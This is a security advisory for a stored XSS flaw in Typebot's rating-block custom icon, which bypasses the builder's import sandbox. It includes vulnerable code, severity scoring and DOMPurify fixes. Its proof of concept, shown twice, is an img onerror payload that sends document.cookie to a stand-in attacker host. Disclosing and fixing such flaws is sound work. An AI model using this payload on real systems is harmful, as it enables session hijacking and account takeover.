GHSA-6M7C-XFHP-P9FH

Vulnerability from github – Published: 2026-05-26 17:39 – Updated: 2026-05-26 17:39
VLAI
Summary
Typebot has Stored XSS via Rating Block Custom Icon that Bypasses isUnsafe Sandbox in Builder Preview
Details

Summary

The rating block's custom icon feature accepts arbitrary HTML/SVG via the customIcon.svg field and renders it using Solid's innerHTML directive without any sanitization. When a malicious typebot is imported or crafted by a workspace collaborator, the payload executes in the builder's DOM context (builder.typebot.io), bypassing the isUnsafe Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application.

Severity

High (CVSS 3.1: 8.7)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

  • Attack Vector: Network — malicious typebot can be delivered via import/template sharing or crafted by a collaborator
  • Attack Complexity: Low — payload is a trivial HTML injection, no special conditions required
  • Privileges Required: Low — attacker needs either collaborator access to a workspace or the ability to distribute a typebot template
  • User Interaction: Required — victim must preview the bot in the builder
  • Scope: Changed — the vulnerable component (embed JS rating renderer) impacts the builder application's authentication context, a different security scope
  • Confidentiality Impact: High — full access to builder session cookies, auth tokens, and API access
  • Integrity Impact: High — can modify bots, workspace settings, or perform any action as the victim user

  • Availability Impact: None — no denial of service vector

  • Builder preview context (CONFIRMED): This is the real vulnerability. The rating block innerHTML bypasses the isUnsafe sandbox mechanism that protects against imported/untrusted Script blocks. The builder preview renders inline on the builder's origin with 'unsafe-inline' CSP, giving the attacker full access to the victim's builder session.

  • Viewer/embed context (NOT incremental): Bot creators already have intentional arbitrary JavaScript execution via Script blocks in production mode (executeScript.ts:22-24). The rating innerHTML does not provide additional capability in this context. This is by design — bot creators control what code runs in their published bots.

The adjusted severity reflects the builder-preview-specific impact, which is still High due to session hijacking potential on the privileged builder origin.

Affected Component

  • packages/embeds/js/src/features/blocks/inputs/rating/components/RatingForm.tsxRatingButton component (lines 153-160)
  • apps/builder/src/features/typebot/helpers/sanitizers.tssanitizeBlock function (lines 63-119) — missing rating block SVG sanitization

CWE

  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Description

Unsanitized innerHTML in Rating Block Custom Icon

The RatingButton component in the embeds JS package renders the custom icon SVG directly into the DOM via Solid's innerHTML directive with no sanitization:

// packages/embeds/js/src/features/blocks/inputs/rating/components/RatingForm.tsx:153-160
<div
  class="flex justify-center items-center rating-icon-container"
  innerHTML={
    props.customIcon?.isEnabled && !isEmpty(props.customIcon.svg)
      ? props.customIcon.svg
      : defaultIcon
  }
/>

The customIcon.svg field is stored as a plain string with no content validation at any layer:

// packages/blocks/inputs/src/rating/schema.ts:21-26
customIcon: z
  .object({
    isEnabled: z.boolean().optional(),
    svg: z.string().optional(),   // No sanitization — any HTML/JS accepted
  })
  .optional(),

Inconsistent Defenses — DOMPurify Available But Not Used

The codebase is aware of innerHTML XSS risks. StreamingBubble.tsx uses dompurify to sanitize content before passing it to innerHTML:

// packages/embeds/js/src/components/bubbles/StreamingBubble.tsx:2,28
import domPurify from "dompurify";
// ...
domPurify.sanitize(marked.parse(line, { breaks: true }), { ADD_ATTR: ["target"] })

DOMPurify is already a dependency of the embeds JS package. The rating block simply fails to use it.

Bypass of the isUnsafe Sandbox Mechanism

The codebase has a safety mechanism for imported/untrusted bots. When a typebot is imported, sanitizeGroups is called with enableSafetyFlags: true:

// apps/builder/src/features/typebot/api/handleImportTypebot.ts:121-128
const groups = (
  duplicatingBot.groups
    ? await sanitizeGroups(duplicatingBot.groups, {
        workspace,
        enableSafetyFlags,   // true for imports
      })
    : []
) as TypebotV6["groups"];

However, sanitizeBlock only flags Script and SetVariable blocks as isUnsafe — rating blocks pass through completely unmodified:

// apps/builder/src/features/typebot/helpers/sanitizers.ts:70-82
const sanitizeBlock = async (block, { enableSafetyFlags, workspace }) => {
  if (!("options" in block) || !block.options) return block;

  if (enableSafetyFlags && block.type === LogicBlockType.SCRIPT) {
    return { ...block, options: { ...block.options, isUnsafe: true } };
  }
  if (enableSafetyFlags && block.type === LogicBlockType.SET_VARIABLE) {
    return { ...block, options: { ...block.options, isUnsafe: true } };
  }
  // Rating blocks with malicious customIcon.svg pass through here unchanged
  // ...
};

At runtime, unsafe Script blocks are sandboxed in a Web Worker during preview:

// packages/embeds/js/src/features/blocks/logic/script/executeScript.ts:14-17
if (isPreview && isUnsafe) {
  const argsRecord = Object.fromEntries(args.map((a) => [a.id, a.value]));
  const result = await runUserCodeInWorker(code, argsRecord);

But the rating block's innerHTML executes directly in the builder's DOM — no Worker, no sandbox, no checks. This creates a complete bypass of the import safety mechanism.

Builder Preview Executes on the Builder Origin

The builder preview renders the bot inline (not in an iframe) via a web component chain:

EditorPage → PreviewDrawer → WebPreview → <Standard /> (@typebot.io/react)
  → <typebot-standard> web component → Bot (Solid.js) → RatingForm → innerHTML

This means the malicious SVG/HTML executes with full access to the builder's DOM, cookies, and authentication context. The builder's CSP includes 'unsafe-inline' for scripts:

// apps/builder/next.config.mjs:79
`script-src 'self' 'unsafe-inline' 'unsafe-eval' blob: https:`

This permits inline event handlers like onerror to execute.

Proof of Concept

Attack Vector 1: Malicious Typebot Import (Primary)

  1. Attacker crafts a typebot JSON file containing:
{
  "groups": [{
    "blocks": [{
      "type": "rating input",
      "options": {
        "buttonType": "Icons",
        "customIcon": {
          "isEnabled": true,
          "svg": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
        }
      }
    }]
  }]
}

  1. Attacker distributes the file (e.g., via community forums, template marketplace, or direct sharing).

  2. Victim imports the typebot into their workspace.

  3. Victim previews the bot in the builder. The rating block renders, triggering:

  4. onerror fires because src=x fails to load
  5. fetch() exfiltrates the victim's session cookies from the builder origin
  6. Script blocks in the same bot would be sandboxed in a Worker due to isUnsafe, but the rating SVG bypasses this entirely

Attack Vector 2: Malicious Workspace Collaborator

  1. Collaborator with editor access modifies a rating block's custom icon SVG.
  2. Workspace owner or admin previews the bot.
  3. Attacker's payload executes in the admin's builder session.

Impact

  • Session hijacking: Attacker can exfiltrate authentication cookies and session tokens from the builder origin
  • Privilege escalation: A collaborator with editor access can execute code in the session of workspace admins/owners
  • Sandbox bypass: Completely circumvents the isUnsafe Web Worker sandbox designed to protect against imported/untrusted bots
  • Account takeover: With stolen session tokens, the attacker can access the victim's full workspace, modify bots, access integrations, and view collected data
  • Defense inconsistency: The codebase sanitizes innerHTML in StreamingBubble.tsx but not in RatingForm.tsx, indicating this is an oversight rather than a design choice

Recommended Remediation

Option 1: Sanitize with DOMPurify at the rendering layer (Preferred)

Apply the same DOMPurify sanitization pattern already used in StreamingBubble.tsx. This protects all paths regardless of where the data originates:

// packages/embeds/js/src/features/blocks/inputs/rating/components/RatingForm.tsx
import domPurify from "dompurify";

// In the RatingButton component:
<div
  class="flex justify-center items-center rating-icon-container"
  innerHTML={
    props.customIcon?.isEnabled && !isEmpty(props.customIcon.svg)
      ? domPurify.sanitize(props.customIcon.svg)
      : defaultIcon
  }
/>

This is the preferred fix because it applies defense at the lowest layer, protecting all callers (builder preview, viewer, embeds).

Option 2: Validate SVG content at the schema/API layer

Add SVG-specific validation in the Zod schema or in sanitizeBlock:

// In sanitizers.ts sanitizeBlock function, add a case for rating blocks:
if (block.type === InputBlockType.RATING && block.options?.customIcon?.svg) {
  const cleanSvg = domPurify.sanitize(block.options.customIcon.svg, {
    USE_PROFILES: { svg: true },
  });
  return {
    ...block,
    options: {
      ...block.options,
      customIcon: { ...block.options.customIcon, svg: cleanSvg },
    },
  };
}

Note: This option alone is insufficient — it only protects data entering through the API, not data already in the database. Combine with Option 1 for defense-in-depth.

Additional Recommendation: Audit other innerHTML usages

FileUploadForm.tsx:234 also renders props.block.options?.labels?.placeholder via innerHTML without sanitization — this should be audited for the same vulnerability class.

Credit

This vulnerability was discovered and reported by bugbunny.ai.

Severity
8.7 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@typebot.io/js"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28445"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-26T17:39:59Z",
    "nvd_published_at": "2026-05-22T17:16:46Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nThe rating block\u0027s custom icon feature accepts arbitrary HTML/SVG via the `customIcon.svg` field and renders it using Solid\u0027s `innerHTML` directive without any sanitization. When a malicious typebot is imported or crafted by a workspace collaborator, the payload executes in the builder\u0027s DOM context (builder.typebot.io), bypassing the `isUnsafe` Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application.\n\n## Severity\n**High** (CVSS 3.1: 8.7)\n\n`CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N`\n\n- **Attack Vector:** Network \u2014 malicious typebot can be delivered via import/template sharing or crafted by a collaborator\n- **Attack Complexity:** Low \u2014 payload is a trivial HTML injection, no special conditions required\n- **Privileges Required:** Low \u2014 attacker needs either collaborator access to a workspace or the ability to distribute a typebot template\n- **User Interaction:** Required \u2014 victim must preview the bot in the builder\n- **Scope:** Changed \u2014 the vulnerable component (embed JS rating renderer) impacts the builder application\u0027s authentication context, a different security scope\n- **Confidentiality Impact:** High \u2014 full access to builder session cookies, auth tokens, and API access\n- **Integrity Impact:** High \u2014 can modify bots, workspace settings, or perform any action as the victim user\n- **Availability Impact:** None \u2014 no denial of service vector\n\n- **Builder preview context (CONFIRMED):** This is the real vulnerability. The rating block innerHTML bypasses the `isUnsafe` sandbox mechanism that protects against imported/untrusted Script blocks. The builder preview renders inline on the builder\u0027s origin with `\u0027unsafe-inline\u0027` CSP, giving the attacker full access to the victim\u0027s builder session.\n- **Viewer/embed context (NOT incremental):** Bot creators already have intentional arbitrary JavaScript execution via Script blocks in production mode (`executeScript.ts:22-24`). The rating innerHTML does not provide additional capability in this context. This is by design \u2014 bot creators control what code runs in their published bots.\n\nThe adjusted severity reflects the builder-preview-specific impact, which is still High due to session hijacking potential on the privileged builder origin.\n\n## Affected Component\n- `packages/embeds/js/src/features/blocks/inputs/rating/components/RatingForm.tsx` \u2014 `RatingButton` component (lines 153-160)\n- `apps/builder/src/features/typebot/helpers/sanitizers.ts` \u2014 `sanitizeBlock` function (lines 63-119) \u2014 missing rating block SVG sanitization\n\n## CWE\n- **CWE-79**: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\n\n## Description\n\n### Unsanitized innerHTML in Rating Block Custom Icon\n\nThe `RatingButton` component in the embeds JS package renders the custom icon SVG directly into the DOM via Solid\u0027s `innerHTML` directive with no sanitization:\n\n```tsx\n// packages/embeds/js/src/features/blocks/inputs/rating/components/RatingForm.tsx:153-160\n\u003cdiv\n  class=\"flex justify-center items-center rating-icon-container\"\n  innerHTML={\n    props.customIcon?.isEnabled \u0026\u0026 !isEmpty(props.customIcon.svg)\n      ? props.customIcon.svg\n      : defaultIcon\n  }\n/\u003e\n```\n\nThe `customIcon.svg` field is stored as a plain string with no content validation at any layer:\n\n```typescript\n// packages/blocks/inputs/src/rating/schema.ts:21-26\ncustomIcon: z\n  .object({\n    isEnabled: z.boolean().optional(),\n    svg: z.string().optional(),   // No sanitization \u2014 any HTML/JS accepted\n  })\n  .optional(),\n```\n\n### Inconsistent Defenses \u2014 DOMPurify Available But Not Used\n\nThe codebase is aware of innerHTML XSS risks. `StreamingBubble.tsx` uses `dompurify` to sanitize content before passing it to `innerHTML`:\n\n```tsx\n// packages/embeds/js/src/components/bubbles/StreamingBubble.tsx:2,28\nimport domPurify from \"dompurify\";\n// ...\ndomPurify.sanitize(marked.parse(line, { breaks: true }), { ADD_ATTR: [\"target\"] })\n```\n\nDOMPurify is already a dependency of the embeds JS package. The rating block simply fails to use it.\n\n### Bypass of the `isUnsafe` Sandbox Mechanism\n\nThe codebase has a safety mechanism for imported/untrusted bots. When a typebot is imported, `sanitizeGroups` is called with `enableSafetyFlags: true`:\n\n```typescript\n// apps/builder/src/features/typebot/api/handleImportTypebot.ts:121-128\nconst groups = (\n  duplicatingBot.groups\n    ? await sanitizeGroups(duplicatingBot.groups, {\n        workspace,\n        enableSafetyFlags,   // true for imports\n      })\n    : []\n) as TypebotV6[\"groups\"];\n```\n\nHowever, `sanitizeBlock` only flags Script and SetVariable blocks as `isUnsafe` \u2014 rating blocks pass through completely unmodified:\n\n```typescript\n// apps/builder/src/features/typebot/helpers/sanitizers.ts:70-82\nconst sanitizeBlock = async (block, { enableSafetyFlags, workspace }) =\u003e {\n  if (!(\"options\" in block) || !block.options) return block;\n\n  if (enableSafetyFlags \u0026\u0026 block.type === LogicBlockType.SCRIPT) {\n    return { ...block, options: { ...block.options, isUnsafe: true } };\n  }\n  if (enableSafetyFlags \u0026\u0026 block.type === LogicBlockType.SET_VARIABLE) {\n    return { ...block, options: { ...block.options, isUnsafe: true } };\n  }\n  // Rating blocks with malicious customIcon.svg pass through here unchanged\n  // ...\n};\n```\n\nAt runtime, unsafe Script blocks are sandboxed in a Web Worker during preview:\n\n```typescript\n// packages/embeds/js/src/features/blocks/logic/script/executeScript.ts:14-17\nif (isPreview \u0026\u0026 isUnsafe) {\n  const argsRecord = Object.fromEntries(args.map((a) =\u003e [a.id, a.value]));\n  const result = await runUserCodeInWorker(code, argsRecord);\n```\n\nBut the rating block\u0027s `innerHTML` executes directly in the builder\u0027s DOM \u2014 no Worker, no sandbox, no checks. This creates a complete bypass of the import safety mechanism.\n\n### Builder Preview Executes on the Builder Origin\n\nThe builder preview renders the bot **inline** (not in an iframe) via a web component chain:\n\n```\nEditorPage \u2192 PreviewDrawer \u2192 WebPreview \u2192 \u003cStandard /\u003e (@typebot.io/react)\n  \u2192 \u003ctypebot-standard\u003e web component \u2192 Bot (Solid.js) \u2192 RatingForm \u2192 innerHTML\n```\n\nThis means the malicious SVG/HTML executes with full access to the builder\u0027s DOM, cookies, and authentication context. The builder\u0027s CSP includes `\u0027unsafe-inline\u0027` for scripts:\n\n```javascript\n// apps/builder/next.config.mjs:79\n`script-src \u0027self\u0027 \u0027unsafe-inline\u0027 \u0027unsafe-eval\u0027 blob: https:`\n```\n\nThis permits inline event handlers like `onerror` to execute.\n\n## Proof of Concept\n\n### Attack Vector 1: Malicious Typebot Import (Primary)\n\n1. Attacker crafts a typebot JSON file containing:\n```json\n{\n  \"groups\": [{\n    \"blocks\": [{\n      \"type\": \"rating input\",\n      \"options\": {\n        \"buttonType\": \"Icons\",\n        \"customIcon\": {\n          \"isEnabled\": true,\n          \"svg\": \"\u003cimg src=x onerror=\\\"fetch(\u0027https://attacker.example/?c=\u0027+document.cookie)\\\"\u003e\"\n        }\n      }\n    }]\n  }]\n}\n```\n\n2. Attacker distributes the file (e.g., via community forums, template marketplace, or direct sharing).\n\n3. Victim imports the typebot into their workspace.\n\n4. Victim previews the bot in the builder. The rating block renders, triggering:\n   - `onerror` fires because `src=x` fails to load\n   - `fetch()` exfiltrates the victim\u0027s session cookies from the builder origin\n   - Script blocks in the same bot would be sandboxed in a Worker due to `isUnsafe`, but the rating SVG bypasses this entirely\n\n### Attack Vector 2: Malicious Workspace Collaborator\n\n1. Collaborator with editor access modifies a rating block\u0027s custom icon SVG.\n2. Workspace owner or admin previews the bot.\n3. Attacker\u0027s payload executes in the admin\u0027s builder session.\n\n## Impact\n\n- **Session hijacking:** Attacker can exfiltrate authentication cookies and session tokens from the builder origin\n- **Privilege escalation:** A collaborator with editor access can execute code in the session of workspace admins/owners\n- **Sandbox bypass:** Completely circumvents the `isUnsafe` Web Worker sandbox designed to protect against imported/untrusted bots\n- **Account takeover:** With stolen session tokens, the attacker can access the victim\u0027s full workspace, modify bots, access integrations, and view collected data\n- **Defense inconsistency:** The codebase sanitizes innerHTML in `StreamingBubble.tsx` but not in `RatingForm.tsx`, indicating this is an oversight rather than a design choice\n\n## Recommended Remediation\n\n### Option 1: Sanitize with DOMPurify at the rendering layer (Preferred)\n\nApply the same DOMPurify sanitization pattern already used in `StreamingBubble.tsx`. This protects all paths regardless of where the data originates:\n\n```tsx\n// packages/embeds/js/src/features/blocks/inputs/rating/components/RatingForm.tsx\nimport domPurify from \"dompurify\";\n\n// In the RatingButton component:\n\u003cdiv\n  class=\"flex justify-center items-center rating-icon-container\"\n  innerHTML={\n    props.customIcon?.isEnabled \u0026\u0026 !isEmpty(props.customIcon.svg)\n      ? domPurify.sanitize(props.customIcon.svg)\n      : defaultIcon\n  }\n/\u003e\n```\n\nThis is the preferred fix because it applies defense at the lowest layer, protecting all callers (builder preview, viewer, embeds).\n\n### Option 2: Validate SVG content at the schema/API layer\n\nAdd SVG-specific validation in the Zod schema or in `sanitizeBlock`:\n\n```typescript\n// In sanitizers.ts sanitizeBlock function, add a case for rating blocks:\nif (block.type === InputBlockType.RATING \u0026\u0026 block.options?.customIcon?.svg) {\n  const cleanSvg = domPurify.sanitize(block.options.customIcon.svg, {\n    USE_PROFILES: { svg: true },\n  });\n  return {\n    ...block,\n    options: {\n      ...block.options,\n      customIcon: { ...block.options.customIcon, svg: cleanSvg },\n    },\n  };\n}\n```\n\nNote: This option alone is insufficient \u2014 it only protects data entering through the API, not data already in the database. Combine with Option 1 for defense-in-depth.\n\n### Additional Recommendation: Audit other innerHTML usages\n\n`FileUploadForm.tsx:234` also renders `props.block.options?.labels?.placeholder` via `innerHTML` without sanitization \u2014 this should be audited for the same vulnerability class.\n\n## Credit\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
  "id": "GHSA-6m7c-xfhp-p9fh",
  "modified": "2026-05-26T17:39:59Z",
  "published": "2026-05-26T17:39:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-6m7c-xfhp-p9fh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28445"
    },
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/commit/474ecbf46bc47a75265bada2599f12b2179de375"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/baptisteArno/typebot.io"
    },
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/blob/v3.16.0/packages/embeds/js/package.json"
    },
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Typebot has Stored XSS via Rating Block Custom Icon that Bypasses isUnsafe Sandbox in Builder Preview"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.